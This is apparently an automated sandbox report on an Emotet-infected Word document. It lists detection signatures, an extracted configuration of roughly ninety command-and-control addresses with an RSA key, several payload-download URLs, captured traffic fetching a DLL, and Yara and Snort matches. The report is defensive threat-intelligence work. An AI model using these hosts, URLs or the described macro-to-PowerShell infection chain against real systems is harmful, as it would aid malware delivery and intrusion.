Analysis Report ARCH_25_012021.doc

Overview

General Information

Sample Name: ARCH_25_012021.doc
Analysis ID: 344852
MD5: baedc37e68b58765fa52c73d0fd2c2d5
SHA1: 2131d1319b5de532638d34f1e3bf68337b6099bf
SHA256: 94485b3ce47d4a2df6dba8e888ca7a360763f7edd5a0448552d1d06b6e4f4baa

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://3musketeersent.net/wp-includes/TUgD/ Avira URL Cloud: Label: malware
Source: http://dashudance.com/thinkphp/dgs7Jm9/ Avira URL Cloud: Label: malware
Source: http://shannared.com/content/lhALeS/ Avira URL Cloud: Label: malware
Source: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/ Avira URL Cloud: Label: malware
Source: http://leopardcranes.com/zynq-linux-yaayf/w/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 7.2.rundll32.exe.2e0000.1.raw.unpack Malware Configuration Extractor: Emotet {"C2 list": ["84.232.229.24:80", "51.255.203.164:8080", "217.160.169.110:8080", "185.183.16.47:80", "190.45.24.210:80", "187.162.248.237:80", "93.146.143.191:80", "185.94.252.27:443", "143.0.85.206:7080", "80.15.100.37:80", "85.105.239.184:443", "94.176.234.118:443", "62.84.75.50:80", "137.74.106.111:7080", "172.104.169.32:8080", "46.105.114.137:8080", "94.126.8.1:80", "78.206.229.130:80", "93.149.120.214:80", "192.175.111.212:7080", "80.249.176.206:80", "181.10.46.92:80", "190.24.243.186:80", "191.223.36.170:80", "177.23.7.151:80", "154.127.113.242:80", "51.255.165.160:8080", "87.106.46.107:8080", "85.214.26.7:8080", "190.247.139.101:80", "46.101.58.37:8080", "201.185.69.28:443", "46.43.2.95:8080", "82.208.146.142:7080", "110.39.160.38:443", "186.177.174.163:80", "51.38.124.206:80", "81.4.105.175:8080", "209.33.120.130:80", "172.245.248.239:8080", "45.16.226.117:443", "104.130.154.83:7080", "217.13.106.14:8080", "94.23.45.86:7080", "152.169.22.67:80", "12.162.84.2:8080", "201.48.121.65:443", "81.17.93.134:80", "81.215.230.173:443", "60.93.23.51:80", "122.201.23.45:443", "31.27.59.105:80", "105.209.235.113:8080", "197.232.36.108:80", "91.233.197.70:80", "87.106.253.248:8080", "138.97.60.141:7080", "152.170.79.100:80", "190.251.216.100:80", "177.85.167.10:80", "212.71.237.140:8080", "82.48.39.246:80", "213.52.74.198:80", "116.125.120.88:443", "81.214.253.80:443", "149.62.173.247:8080", "152.231.89.226:80", "206.189.232.2:8080", "181.30.61.163:443", "1.226.84.243:8080", "191.241.233.198:80", "109.101.137.162:8080", "110.39.162.2:443", "167.71.148.58:443", "5.196.35.138:7080", "190.64.88.186:443", "200.75.39.254:80", "138.97.60.140:8080", "170.81.48.2:80", "70.32.115.157:8080", "104.131.41.185:8080", "190.162.232.138:80", "188.135.15.49:80", "95.76.153.115:80", "188.225.32.231:7080", "12.163.208.58:80", "50.28.51.143:8080", "202.134.4.210:7080", "190.210.246.253:80", "149.202.72.142:7080", "138.197.99.250:8080", "68.183.190.199:8080", "211.215.18.93:8080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}
Multi AV Scanner detection for domain / URL
Source: http://3musketeersent.net/wp-includes/TUgD/ Virustotal: Detection: 8%
Source: https://skilmu.com/wp-admin/hQVlB8b/ Virustotal: Detection: 10%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Kaktksw\An6othh\N49I.dll ReversingLabs: Detection: 82%
Multi AV Scanner detection for submitted file
Source: ARCH_25_012021.doc Virustotal: Detection: 57%
Source: ARCH_25_012021.doc ReversingLabs: Detection: 26%
Machine Learning detection for dropped file
Source: C:\Users\user\Kaktksw\An6othh\N49I.dll Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0074CC2A CryptDecodeObjectEx, 14_2_0074CC2A

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2098362682.0000000002740000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: shannared.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.169.223.13:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.169.223.13:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.22:49168 -> 84.232.229.24:80
Source: Traffic Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.22:49169 -> 51.255.203.164:8080
Source: Traffic Snort IDS: 2404328 ET CNC Feodo Tracker Reported CnC Server TCP group 15 192.168.2.22:49171 -> 217.160.169.110:8080
Source: Traffic Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49173 -> 185.183.16.47:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 84.232.229.24:80
Source: Malware configuration extractor IPs: 51.255.203.164:8080
Source: Malware configuration extractor IPs: 217.160.169.110:8080
Source: Malware configuration extractor IPs: 185.183.16.47:80
Source: Malware configuration extractor IPs: 190.45.24.210:80
Source: Malware configuration extractor IPs: 187.162.248.237:80
Source: Malware configuration extractor IPs: 93.146.143.191:80
Source: Malware configuration extractor IPs: 185.94.252.27:443
Source: Malware configuration extractor IPs: 143.0.85.206:7080
Source: Malware configuration extractor IPs: 80.15.100.37:80
Source: Malware configuration extractor IPs: 85.105.239.184:443
Source: Malware configuration extractor IPs: 94.176.234.118:443
Source: Malware configuration extractor IPs: 62.84.75.50:80
Source: Malware configuration extractor IPs: 137.74.106.111:7080
Source: Malware configuration extractor IPs: 172.104.169.32:8080
Source: Malware configuration extractor IPs: 46.105.114.137:8080
Source: Malware configuration extractor IPs: 94.126.8.1:80
Source: Malware configuration extractor IPs: 78.206.229.130:80
Source: Malware configuration extractor IPs: 93.149.120.214:80
Source: Malware configuration extractor IPs: 192.175.111.212:7080
Source: Malware configuration extractor IPs: 80.249.176.206:80
Source: Malware configuration extractor IPs: 181.10.46.92:80
Source: Malware configuration extractor IPs: 190.24.243.186:80
Source: Malware configuration extractor IPs: 191.223.36.170:80
Source: Malware configuration extractor IPs: 177.23.7.151:80
Source: Malware configuration extractor IPs: 154.127.113.242:80
Source: Malware configuration extractor IPs: 51.255.165.160:8080
Source: Malware configuration extractor IPs: 87.106.46.107:8080
Source: Malware configuration extractor IPs: 85.214.26.7:8080
Source: Malware configuration extractor IPs: 190.247.139.101:80
Source: Malware configuration extractor IPs: 46.101.58.37:8080
Source: Malware configuration extractor IPs: 201.185.69.28:443
Source: Malware configuration extractor IPs: 46.43.2.95:8080
Source: Malware configuration extractor IPs: 82.208.146.142:7080
Source: Malware configuration extractor IPs: 110.39.160.38:443
Source: Malware configuration extractor IPs: 186.177.174.163:80
Source: Malware configuration extractor IPs: 51.38.124.206:80
Source: Malware configuration extractor IPs: 81.4.105.175:8080
Source: Malware configuration extractor IPs: 209.33.120.130:80
Source: Malware configuration extractor IPs: 172.245.248.239:8080
Source: Malware configuration extractor IPs: 45.16.226.117:443
Source: Malware configuration extractor IPs: 104.130.154.83:7080
Source: Malware configuration extractor IPs: 217.13.106.14:8080
Source: Malware configuration extractor IPs: 94.23.45.86:7080
Source: Malware configuration extractor IPs: 152.169.22.67:80
Source: Malware configuration extractor IPs: 12.162.84.2:8080
Source: Malware configuration extractor IPs: 201.48.121.65:443
Source: Malware configuration extractor IPs: 81.17.93.134:80
Source: Malware configuration extractor IPs: 81.215.230.173:443
Source: Malware configuration extractor IPs: 60.93.23.51:80
Source: Malware configuration extractor IPs: 122.201.23.45:443
Source: Malware configuration extractor IPs: 31.27.59.105:80
Source: Malware configuration extractor IPs: 105.209.235.113:8080
Source: Malware configuration extractor IPs: 197.232.36.108:80
Source: Malware configuration extractor IPs: 91.233.197.70:80
Source: Malware configuration extractor IPs: 87.106.253.248:8080
Source: Malware configuration extractor IPs: 138.97.60.141:7080
Source: Malware configuration extractor IPs: 152.170.79.100:80
Source: Malware configuration extractor IPs: 190.251.216.100:80
Source: Malware configuration extractor IPs: 177.85.167.10:80
Source: Malware configuration extractor IPs: 212.71.237.140:8080
Source: Malware configuration extractor IPs: 82.48.39.246:80
Source: Malware configuration extractor IPs: 213.52.74.198:80
Source: Malware configuration extractor IPs: 116.125.120.88:443
Source: Malware configuration extractor IPs: 81.214.253.80:443
Source: Malware configuration extractor IPs: 149.62.173.247:8080
Source: Malware configuration extractor IPs: 152.231.89.226:80
Source: Malware configuration extractor IPs: 206.189.232.2:8080
Source: Malware configuration extractor IPs: 181.30.61.163:443
Source: Malware configuration extractor IPs: 1.226.84.243:8080
Source: Malware configuration extractor IPs: 191.241.233.198:80
Source: Malware configuration extractor IPs: 109.101.137.162:8080
Source: Malware configuration extractor IPs: 110.39.162.2:443
Source: Malware configuration extractor IPs: 167.71.148.58:443
Source: Malware configuration extractor IPs: 5.196.35.138:7080
Source: Malware configuration extractor IPs: 190.64.88.186:443
Source: Malware configuration extractor IPs: 200.75.39.254:80
Source: Malware configuration extractor IPs: 138.97.60.140:8080
Source: Malware configuration extractor IPs: 170.81.48.2:80
Source: Malware configuration extractor IPs: 70.32.115.157:8080
Source: Malware configuration extractor IPs: 104.131.41.185:8080
Source: Malware configuration extractor IPs: 190.162.232.138:80
Source: Malware configuration extractor IPs: 188.135.15.49:80
Source: Malware configuration extractor IPs: 95.76.153.115:80
Source: Malware configuration extractor IPs: 188.225.32.231:7080
Source: Malware configuration extractor IPs: 12.163.208.58:80
Source: Malware configuration extractor IPs: 50.28.51.143:8080
Source: Malware configuration extractor IPs: 202.134.4.210:7080
Source: Malware configuration extractor IPs: 190.210.246.253:80
Source: Malware configuration extractor IPs: 149.202.72.142:7080
Source: Malware configuration extractor IPs: 138.197.99.250:8080
Source: Malware configuration extractor IPs: 68.183.190.199:8080
Source: Malware configuration extractor IPs: 211.215.18.93:8080
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp String found in memory: http://shannared.com/content/lhALeS/!http://jeevanlic.com/wp-content/r8M/!http://dashudance.com/thinkphp/dgs7Jm9/!http://leopardcranes.com/zynq-linux-yaayf/w/!http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/!http://3musketeersent.net/wp-includes/TUgD/!https://skilmu.com/wp-admin/hQVlB8b/
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 51.255.203.164:8080
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 217.160.169.110:8080
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected:
  HTTP/1.1 200 OK
  Cache-Control: no-cache, must-revalidate
  Pragma: no-cache
  Expires: Wed, 27 Jan 2021 08:30:36 GMT
  Content-Disposition: attachment; filename="O9TGnKaUCw.dll"
  Content-Transfer-Encoding: binary
  Set-Cookie: 601124ac53678=1611736236; expires=Wed, 27-Jan-2021 08:31:36 GMT; Max-Age=60; path=/
  Last-Modified: Wed, 27 Jan 2021 08:30:36 GMT
  X-XSS-Protection: 1; mode=block
  X-Content-Type-Options: nosniff
  Content-Type: application/octet-stream
  X-Cacheable: YES:Forced
  Content-Length: 631808
  Accept-Ranges: bytes
  Date: Wed, 27 Jan 2021 08:30:36 GMT
  Age: 0
  Vary: User-Agent
  X-Cache: uncached
  X-Cache-Hit: MISS
  X-Backend: all_requests
  Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 30 06 00 00 70 03 00 00 00 00 00 bc 3e 06 00 00 10 00 00 00 40 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 ec 22 00 00 00 10 07 00 00 c6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 d4 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 e8 2e 06 00 00 10 00 00 00 30 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 cc 14 00 00 00 40 06 00 00 16 00 00 00 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 d1 0c 00 00 00 60 06 00 00 00 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 22 00 00 00 70 06 00 00 24 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d4 6e 00 00 00 a0
  Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected:
  GET /content/lhALeS/ HTTP/1.1
  Host: shannared.com
  Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.169.223.13 192.169.223.13
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
Source: Joe Sandbox View ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View ASN Name: RCS-RDS73-75DrStaicoviciRO RCS-RDS73-75DrStaicoviciRO
Source: unknown TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 217.160.169.110
Source: unknown TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: unknown TCP traffic detected without corresponding DNS query: 185.183.16.47
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A07E7EB5-D643-47FF-B622-0CF30ED55516}.tmp
Source: global traffic HTTP traffic detected:
  GET /content/lhALeS/ HTTP/1.1
  Host: shannared.com
  Connection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: shannared.com
Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp String found in binary or memory: http://3musketeersent.net/wp-includes/TUgD/
Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp String found in binary or memory: http://dashudance.com/thinkphp/dgs7Jm9/
Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp String found in binary or memory: http://jeevanlic.com/wp-content/r8M/
Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp String found in binary or memory: http://leopardcranes.com/zynq-linux-yaayf/w/
Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp String found in binary or memory: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/
Source: powershell.exe, 00000005.00000002.2098057868.00000000022D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103421581.0000000002980000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp String found in binary or memory: http://shannared.com
Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2103532538.000000001B8B6000.00000004.00000001.sdmp String found in binary or memory: http://shannared.com/content/lhALeS/
Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2098057868.00000000022D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103421581.0000000002980000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/
Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp String found in binary or memory: https://skilmu.com/wp-admin/hQVlB8b/

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 0000000E.00000002.2340258197.0000000000740000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2340368896.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2114550082.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2102026803.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2114093455.0000000000710000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103817256.0000000000770000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2112160359.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2106310017.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2099609589.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2113942317.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2106250328.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103543445.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2112213482.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2099871520.0000000000510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103566665.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2099349373.0000000000240000.00000040.00020000.sdmp, type: MEMORY
